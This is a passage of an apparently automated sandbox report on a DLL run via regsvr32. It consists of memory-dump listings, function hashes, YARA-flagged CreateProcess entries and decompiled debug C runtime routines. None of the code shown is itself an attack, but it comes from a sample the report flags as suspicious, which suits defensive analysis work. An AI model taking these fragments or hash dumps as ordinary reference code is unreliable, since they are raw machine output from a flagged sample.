                                                  • Associated: 00000003.00000002.926236480.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926256789.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926274348.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926337825.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: _calloc_dbg$InfoStartup_calloc_dbg_impl
                                                  • String ID: f:\dd\vctools\crt_bld\self_64_amd64\crt\src\ioinit.c
                                                  • API String ID: 1930727954-3864165772
                                                  • Opcode ID: 6ce8cb6e1d9cf3b4bca9567c45291f9c0e6eb32f85ec4de2f3338e3031d5b08d
                                                  • Instruction ID: 1d91a8b9fbbdfe7efb2cec2f51c290a43986955e3ccc02e10ec1e86e5f3f07e0
                                                  • Opcode Fuzzy Hash: 6ce8cb6e1d9cf3b4bca9567c45291f9c0e6eb32f85ec4de2f3338e3031d5b08d
                                                  • Instruction Fuzzy Hash: 88F1D82260DBC5C9E7B08B19E88076EB7A0F385B64F258226CAED477E4DB3DD445CB11
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926240012.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                  • Associated: 00000003.00000002.926236480.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926256789.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926274348.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926337825.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: _calloc_dbg$__initmbctable_invalid_parameter_invoke_watson_if_error
                                                  • String ID: _setenvp$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\stdenvp.c$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\stdenvp.c$strcpy_s(*env, cchars, p)$~
                                                  • API String ID: 1648969265-681193798
                                                  • Opcode ID: a4493985eb34f23491eb94dc9b506d74831480b604230057d9b95ae3580ffa29
                                                  • Instruction ID: 6f04160d34b6c1fe028a5367eccc3c8ebf9b699179af2d046024218ded9634d0
                                                  • Opcode Fuzzy Hash: a4493985eb34f23491eb94dc9b506d74831480b604230057d9b95ae3580ffa29
                                                  • Instruction Fuzzy Hash: 14514F31A1DB8682EB90CB19E88576E77E0F385794F704126EACE477B4DB7EE4408B41
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926240012.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                  • Associated: 00000003.00000002.926236480.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926256789.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926274348.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926337825.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: Pointer$Decode$_initterm$EncodeExitProcess__crt
                                                  • String ID:
                                                  • API String ID: 3799933513-0
                                                  • Opcode ID: c9a1689ff4177d35e5a558f0089bed0cb41f7669401f9128f576ef3edf69137f
                                                  • Instruction ID: 37cfb5e84e154ae2fbcc5f75e30e47dd1cf7b4373ba061ec72f9a9691eeac49a
                                                  • Opcode Fuzzy Hash: c9a1689ff4177d35e5a558f0089bed0cb41f7669401f9128f576ef3edf69137f
                                                  • Instruction Fuzzy Hash: 36511C3291DB4281E6A09B58EC8436EB7E0F386794F315125EACD427B9DF7EE544CB01
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926240012.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                  • Associated: 00000003.00000002.926236480.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926256789.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926274348.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926337825.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: EnvironmentStrings$ByteCharFreeMultiWide
                                                  • String ID: f:\dd\vctools\crt_bld\self_64_amd64\crt\src\a_env.c
                                                  • API String ID: 1823725401-2473407871
                                                  • Opcode ID: 12bd68ef287a579055a6545109484f2ffc82b1f6f13cfb147b3cff23ff6676d3
                                                  • Instruction ID: f3219d0a3466b597a7d077589c81ae53176584dcfccb647f84a4fae4f36a6977
                                                  • Opcode Fuzzy Hash: 12bd68ef287a579055a6545109484f2ffc82b1f6f13cfb147b3cff23ff6676d3
                                                  • Instruction Fuzzy Hash: B141A536618B8586E794CB56F84432FB7E1F785B94F200429EBCD47BA8DBBED4448B00
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  APIs
                                                    • Part of subcall function 000007FEF9D27540: _initp_misc_winsig.LIBCMTD ref: 000007FEF9D2757B
                                                    • Part of subcall function 000007FEF9D27540: _initp_eh_hooks.LIBCMTD ref: 000007FEF9D27585
                                                    • Part of subcall function 000007FEF9D28FE0: InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 000007FEF9D2906F
                                                  • FlsAlloc.KERNEL32 ref: 000007FEF9D23D55
                                                    • Part of subcall function 000007FEF9D23E00: FlsFree.KERNEL32 ref: 000007FEF9D23E13
                                                    • Part of subcall function 000007FEF9D23E00: _mtdeletelocks.LIBCMTD ref: 000007FEF9D23E23
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926240012.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                  • Associated: 00000003.00000002.926236480.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926256789.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926274348.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926337825.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: AllocCountCriticalFreeInitializeSectionSpin_initp_eh_hooks_initp_misc_winsig_mtdeletelocks
                                                  • String ID: f:\dd\vctools\crt_bld\self_64_amd64\crt\src\tidtable.c
                                                  • API String ID: 3828364660-3898981997
                                                  • Opcode ID: 433987b36a956229ec77e0de1d2b7e358b1fb906a8f620ef815ae1dd4af6a87a
                                                  • Instruction ID: 54e8e70dd377f15c5e8b83e2f7140eab641006b368099d9e1d163193fdf976c7
                                                  • Opcode Fuzzy Hash: 433987b36a956229ec77e0de1d2b7e358b1fb906a8f620ef815ae1dd4af6a87a
                                                  • Instruction Fuzzy Hash: 5A115E30A2D60286F3E0AB25ED4577DA6E1B784B60F215671E9EE422F5DB2FE4048611
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  C-Code - Quality: 50%
                                                  			E000007FE7FEF9D2461B(void* __rdx, void* __r8, long long _a32, long long _a40, intOrPtr _a64, long long _a72, void* _a80, intOrPtr _a88, long long _a96, long long _a128, signed int _a136, long long _a144, intOrPtr _a152, void* _a160) {
                                                  				signed int _t64;
                                                  				intOrPtr _t66;
                                                  				void* _t73;
                                                  				void* _t92;
                                                  				long long _t98;
                                                  				long long _t113;
                                                  				long long _t114;
                                                  				long long _t115;
                                                  				long long _t130;
                                                  				intOrPtr _t132;
                                                  				long long _t135;
                                                  
                                                  				if (_a136 == 1) goto 0xf9d24672;
                                                  				_t64 = _a136 & 0x0000ffff;
                                                  				if (_t64 == 2) goto 0xf9d24672;
                                                  				if (_a136 == 3) goto 0xf9d24672;
                                                  				_a40 = "Error: memory allocation: bad memory block type.\n";
                                                  				_a32 = "%s";
                                                  				r9d = 0;
                                                  				r8d = 0;
                                                  				0xf9d2ad00();
                                                  				if (_t64 != 1) goto 0xf9d24672;
                                                  				asm("int3");
                                                  				_t98 = _a128 + 0x34;
                                                  				_a96 = _t98;
                                                  				0xf9d2ac90(); // executed
                                                  				_a80 = _t98;
                                                  				if (_a80 != 0) goto 0xf9d246b8;
                                                  				if (_a160 == 0) goto 0xf9d246b3;
                                                  				 *_a160 = 0xc;
                                                  				goto 0xf9d248b4;
                                                  				_t66 =  *0xf9d4b03c; // 0x39
                                                  				 *0xf9d4b03c = _t66 + 1;
                                                  				if (_a64 == 0) goto 0xf9d2472d;
                                                  				 *_a80 = 0;
                                                  				 *((long long*)(_a80 + 8)) = 0;
                                                  				 *((long long*)(_a80 + 0x10)) = 0;
                                                  				 *((intOrPtr*)(_a80 + 0x18)) = 0xfedcbabc;
                                                  				 *((long long*)(_a80 + 0x20)) = _a128;
                                                  				 *(_a80 + 0x1c) = 3;
                                                  				 *((intOrPtr*)(_a80 + 0x28)) = 0;
                                                  				goto 0xf9d24844;
                                                  				if (0xffffffff -  *0xf9d4c960 - _a128 <= 0) goto 0xf9d24763;
                                                  				_t130 =  *0xf9d4c960; // 0x4594
                                                  				 *0xf9d4c960 = _t130 + _a128;
                                                  				goto 0xf9d2476e;
                                                  				 *0xf9d4c960 = 0xffffffff;
                                                  				_t132 =  *0xf9d4c990; // 0xa0c
                                                  				 *0xf9d4c990 = _t132 + _a128;
                                                  				_t113 =  *0xf9d4c978; // 0x35bc
                                                  				_t92 =  *0xf9d4c990 - _t113; // 0xa0c
                                                  				if (_t92 <= 0) goto 0xf9d247a8;
                                                  				_t114 =  *0xf9d4c990; // 0xa0c
                                                  				 *0xf9d4c978 = _t114;
                                                  				if ( *0xf9d4c980 == 0) goto 0xf9d247c4;
                                                  				_t115 =  *0xf9d4c980; // 0x2303b00
                                                  				 *((long long*)(_t115 + 8)) = _a80;
                                                  				goto 0xf9d247d0;
                                                  				 *0xf9d4c968 = _a80;
                                                  				_t135 =  *0xf9d4c980; // 0x2303b00
                                                  				 *_a80 = _t135;
                                                  				 *((long long*)(_a80 + 8)) = 0;
                                                  				 *((long long*)(_a80 + 0x10)) = _a144;
                                                  				 *((intOrPtr*)(_a80 + 0x18)) = _a152;
                                                  				 *((long long*)(_a80 + 0x20)) = _a128;
                                                  				 *(_a80 + 0x1c) = _a136;
                                                  				_t78 = _a88;
                                                  				 *((intOrPtr*)(_a80 + 0x28)) = _a88;
                                                  				 *0xf9d4c980 = _a80;
                                                  				r8d = 4;
                                                  				E000007FE7FEF9D232B0( *0xf9d4b04c & 0x000000ff, _a88,  *0xf9d4b04c & 0x000000ff, _a80 + 0x2c, __rdx, __r8);
                                                  				_t145 = _a128;
                                                  				r8d = 4;
                                                  				E000007FE7FEF9D232B0( *0xf9d4b04c & 0x000000ff, _a88,  *0xf9d4b04c & 0x000000ff, _a80 + _a128 + 0x30, _a128, __r8);
                                                  				_t73 = E000007FE7FEF9D232B0( *0xf9d4b04f & 0x000000ff, _t78,  *0xf9d4b04f & 0x000000ff, _a80 + 0x30, _t145, _a128);
                                                  				_a72 = _a80 + 0x30;
                                                  				return E000007FE7FEF9D29360(_t73, 4);
                                                  			}














                                                  0x7fef9d24623
                                                  0x7fef9d2462c
                                                  0x7fef9d24634
                                                  0x7fef9d2463e
                                                  0x7fef9d24647
                                                  0x7fef9d24653
                                                  0x7fef9d24658
                                                  0x7fef9d2465b
                                                  0x7fef9d24665
                                                  0x7fef9d2466d
                                                  0x7fef9d2466f
                                                  0x7fef9d2467a
                                                  0x7fef9d2467e
                                                  0x7fef9d24688
                                                  0x7fef9d2468d
                                                  0x7fef9d24698
                                                  0x7fef9d246a3
                                                  0x7fef9d246ad
                                                  0x7fef9d246b3
                                                  0x7fef9d246b8
                                                  0x7fef9d246c0
                                                  0x7fef9d246cb
                                                  0x7fef9d246d2
                                                  0x7fef9d246de
                                                  0x7fef9d246eb
                                                  0x7fef9d246f8
                                                  0x7fef9d2470c
                                                  0x7fef9d24715
                                                  0x7fef9d24721
                                                  0x7fef9d24728
                                                  0x7fef9d24743
                                                  0x7fef9d2474d
                                                  0x7fef9d2475a
                                                  0x7fef9d24761
                                                  0x7fef9d24763
                                                  0x7fef9d24776
                                                  0x7fef9d24783
                                                  0x7fef9d2478a
                                                  0x7fef9d24791
                                                  0x7fef9d24798
                                                  0x7fef9d2479a
                                                  0x7fef9d247a1
                                                  0x7fef9d247b0
                                                  0x7fef9d247b2
                                                  0x7fef9d247be
                                                  0x7fef9d247c2
                                                  0x7fef9d247c9
                                                  0x7fef9d247d5
                                                  0x7fef9d247dc
                                                  0x7fef9d247e4
                                                  0x7fef9d247f9
                                                  0x7fef9d24809
                                                  0x7fef9d24819
                                                  0x7fef9d24829
                                                  0x7fef9d24831
                                                  0x7fef9d24835
                                                  0x7fef9d2483d
                                                  0x7fef9d24854
                                                  0x7fef9d2485c
                                                  0x7fef9d2486d
                                                  0x7fef9d2487a
                                                  0x7fef9d24882
                                                  0x7fef9d248a1
                                                  0x7fef9d248af
                                                  0x7fef9d248c7

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926240012.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                  • Associated: 00000003.00000002.926236480.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926256789.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926274348.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926337825.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: _unlock
                                                  • String ID: Error: memory allocation: bad memory block type.
                                                  • API String ID: 2480363372-1537269110
                                                  • Opcode ID: 0e27953d906dd6213389af50a7459ab3260dce137a7056963e47b3559a26f049
                                                  • Instruction ID: 3c0f980f6ccd09ea8afc11027f8ae4c535623d5f1e7c019e481493293b97b3b1
                                                  • Opcode Fuzzy Hash: 0e27953d906dd6213389af50a7459ab3260dce137a7056963e47b3559a26f049
                                                  • Instruction Fuzzy Hash: 4B71EB36A09B8586DBA0CB59E89036EB7E0F3C9B90F218526DADD437A4DF7DD044CB40
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926206063.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CreateProcess
                                                  • String ID: z
                                                  • API String ID: 963392458-1375040831
                                                  • Opcode ID: 044b6e1ce48cfd18270e48a4d1ffa5fa37b68dcc1aa27e33fe08f1a26b59e50a
                                                  • Instruction ID: 5490f85ef4092ec497088e60b932e525f0ce693db587fe3a551d92928695aba5
                                                  • Opcode Fuzzy Hash: 044b6e1ce48cfd18270e48a4d1ffa5fa37b68dcc1aa27e33fe08f1a26b59e50a
                                                  • Instruction Fuzzy Hash: 5141C27191C7848FD7A5DF18D08A7DAB7E0FB98318F01495DE88CC7292DB749885CB46
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926206063.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CreateProcess
                                                  • String ID: z
                                                  • API String ID: 963392458-1375040831
                                                  • Opcode ID: 274a6825be770f02a4f82c9f6cbe831b28a77f7637ef6bb2e3a1323e28db6850
                                                  • Instruction ID: 90d0215384d3738c1bd812602d16852eefab8a4974bd8bae5625081230a7a3ff
                                                  • Opcode Fuzzy Hash: 274a6825be770f02a4f82c9f6cbe831b28a77f7637ef6bb2e3a1323e28db6850
                                                  • Instruction Fuzzy Hash: 4741377091CB848BD7B4DF18D08A7AAB7E0FB98315F10495EE88CC3252DB7498848B86
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926240012.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                  • Associated: 00000003.00000002.926236480.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926256789.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926274348.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926337825.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: EncodePointer_initterm_e
                                                  • String ID: Y
                                                  • API String ID: 1618838664-1754117475
                                                  • Opcode ID: 24d3616295d43623420cef2980f0f4d1896d7dbbaf9113ec39dfe7d3f9684184
                                                  • Instruction ID: e2eda9ea6841371ef03f52dec0317b7f8d7542193ab5d09d46fee122be74aa2a
                                                  • Opcode Fuzzy Hash: 24d3616295d43623420cef2980f0f4d1896d7dbbaf9113ec39dfe7d3f9684184
                                                  • Instruction Fuzzy Hash: 1DE0C22190C042A7FAA1AB24ED453BE63E0B791344FA14231E2CD824B5EB2FF908CB11
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 62%
                                                  			E000007FE7FEF9D27540(long long __rax) {
                                                  				long long _v24;
                                                  				void* _t8;
                                                  				void* _t9;
                                                  
                                                  				_t16 = __rax;
                                                  				_t9 = E000007FE7FEF9D23D00(_t8); // executed
                                                  				_v24 = __rax;
                                                  				return E000007FE7FEF9D2CF20(E000007FE7FEF9D2CFB0(E000007FE7FEF9D2D450(E000007FE7FEF9D2D470(E000007FE7FEF9D2BD50(E000007FE7FEF9D2AB90(_t9, _v24), _v24), _v24), _v24), _v24), _t16, _v24);
                                                  			}






                                                  0x7fef9d27540
                                                  0x7fef9d27544
                                                  0x7fef9d27549
                                                  0x7fef9d2758e

                                                  APIs
                                                    • Part of subcall function 000007FEF9D23D00: RtlEncodePointer.NTDLL ref: 000007FEF9D23D06
                                                  • _initp_misc_winsig.LIBCMTD ref: 000007FEF9D2757B
                                                  • _initp_eh_hooks.LIBCMTD ref: 000007FEF9D27585
                                                    • Part of subcall function 000007FEF9D2CF20: EncodePointer.KERNEL32(?,?,?,?,000007FEF9D2758A,?,?,?,?,?,?,000007FEF9D23D39), ref: 000007FEF9D2CF30
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926240012.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                  • Associated: 00000003.00000002.926236480.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926256789.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926274348.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926337825.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: EncodePointer$_initp_eh_hooks_initp_misc_winsig
                                                  • String ID:
                                                  • API String ID: 2678799220-0
                                                  • Opcode ID: abe4bcf42024140c0e82e0fb2c3eff25659a698c9099ae3cd415aa6bcc21eafa
                                                  • Instruction ID: d1131ca10be328b200f0d94da683d71e83c9d45f094ccb2362bb8b9ac37f618d
                                                  • Opcode Fuzzy Hash: abe4bcf42024140c0e82e0fb2c3eff25659a698c9099ae3cd415aa6bcc21eafa
                                                  • Instruction Fuzzy Hash: CFE07D6391D58181E6B0BB21EC5226E93B0F7C8788F610171B6CD47A7BCE1DE9018B80
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926240012.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                  • Associated: 00000003.00000002.926236480.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926256789.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926274348.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926337825.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: ExitProcess$AllocateHeap__crt
                                                  • String ID:
                                                  • API String ID: 4215626177-0
                                                  • Opcode ID: 77cc9cc60f8eca6ccffa51c036cc335ce9466cc401fd995fa093edd43c12ab32
                                                  • Instruction ID: 018cd22ed3aaffe80bc67b356604b0c029bcf26b5d2cff022e0890546f5cf117
                                                  • Opcode Fuzzy Hash: 77cc9cc60f8eca6ccffa51c036cc335ce9466cc401fd995fa093edd43c12ab32
                                                  • Instruction Fuzzy Hash: AFE04F2490898683E7A49726E80037D63E0FB84348F614036D7CE026F5CF2FE840E601
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 58%
                                                  			E000007FE7FEF9D24399(long long __rax, long long _a48, intOrPtr _a80, intOrPtr _a88, void* _a120) {
                                                  
                                                  				_a48 = __rax;
                                                  				if (_a48 == 0) goto 0xf9d243ad;
                                                  				goto 0xf9d243f5;
                                                  				if (_a88 != 0) goto 0xf9d243ce;
                                                  				if (_a120 == 0) goto 0xf9d243c7;
                                                  				 *_a120 = 0xc;
                                                  				goto 0xf9d243f5;
                                                  				if (E000007FE7FEF9D2ABB0(_a48, _a80) != 0) goto 0xf9d243f3;
                                                  				if (_a120 == 0) goto 0xf9d243ef;
                                                  				 *_a120 = 0xc;
                                                  				goto 0xf9d243f5;
                                                  				goto 0xf9d24377;
                                                  				return 0;
                                                  			}



                                                  0x7fef9d24399
                                                  0x7fef9d243a4
                                                  0x7fef9d243ab
                                                  0x7fef9d243b2
                                                  0x7fef9d243ba
                                                  0x7fef9d243c1
                                                  0x7fef9d243cc
                                                  0x7fef9d243da
                                                  0x7fef9d243e2
                                                  0x7fef9d243e9
                                                  0x7fef9d243f1
                                                  0x7fef9d243f3
                                                  0x7fef9d243f9

                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926240012.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                  • Associated: 00000003.00000002.926236480.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926256789.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926274348.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926337825.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1ac0a5da81333129a8f229358abc3f3628bfe7ae3225332448e9bf5308d83ad5
                                                  • Instruction ID: 1adc9abf0de1c3ca8893cd90e215b0d97e51771cadcbd8eff06287440f46b9d2
                                                  • Opcode Fuzzy Hash: 1ac0a5da81333129a8f229358abc3f3628bfe7ae3225332448e9bf5308d83ad5
                                                  • Instruction Fuzzy Hash: 8B01B332A5CB41C6F7A08A55E84472EA7E0F7C4794F321121AECD42BB8CB7DE440CA00
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926240012.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                  • Associated: 00000003.00000002.926236480.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926256789.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926274348.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926337825.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: _ioterm
                                                  • String ID:
                                                  • API String ID: 4163092671-0
                                                  • Opcode ID: ccd1307e9d50970cca75b27b642d85769dad3e23086d7af9cb1c5234e8638c27
                                                  • Instruction ID: 7377a742d64af20529275359c4a94eabcf7c0d21081332a84b693dd33c507e1a
                                                  • Opcode Fuzzy Hash: ccd1307e9d50970cca75b27b642d85769dad3e23086d7af9cb1c5234e8638c27
                                                  • Instruction Fuzzy Hash: F4F03720C0C10789FAE16778AC0A37CA1D1A711B91F3252F5A0DC821F2D77FB54A8A12
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • _ioterm.LIBCMTD ref: 000007FEF9D23437
                                                    • Part of subcall function 000007FEF9D27D00: DeleteCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000007FEF9D2343C), ref: 000007FEF9D27D93
                                                    • Part of subcall function 000007FEF9D23E00: FlsFree.KERNEL32 ref: 000007FEF9D23E13
                                                    • Part of subcall function 000007FEF9D23E00: _mtdeletelocks.LIBCMTD ref: 000007FEF9D23E23
                                                    • Part of subcall function 000007FEF9D288D0: HeapDestroy.KERNELBASE ref: 000007FEF9D288DB
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926240012.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                  • Associated: 00000003.00000002.926236480.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926256789.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926274348.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926337825.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: CriticalDeleteDestroyFreeHeapSection_ioterm_mtdeletelocks
                                                  • String ID:
                                                  • API String ID: 1508997487-0
                                                  • Opcode ID: bdb7225874b5496ab185c850c138daf46d614203cfe4a73cb1b8596e23d721ba
                                                  • Instruction ID: 18d5f63124407e78997e2f664e67049843f9c9ac3d7a6681d0ffcba3130af5de
                                                  • Opcode Fuzzy Hash: bdb7225874b5496ab185c850c138daf46d614203cfe4a73cb1b8596e23d721ba
                                                  • Instruction Fuzzy Hash: 50E06760E0C1439AF6D567B46C423BD91D06B54BC1FB245B2A1CE862F3EA5FB8014662
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926240012.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                  • Associated: 00000003.00000002.926236480.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926256789.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
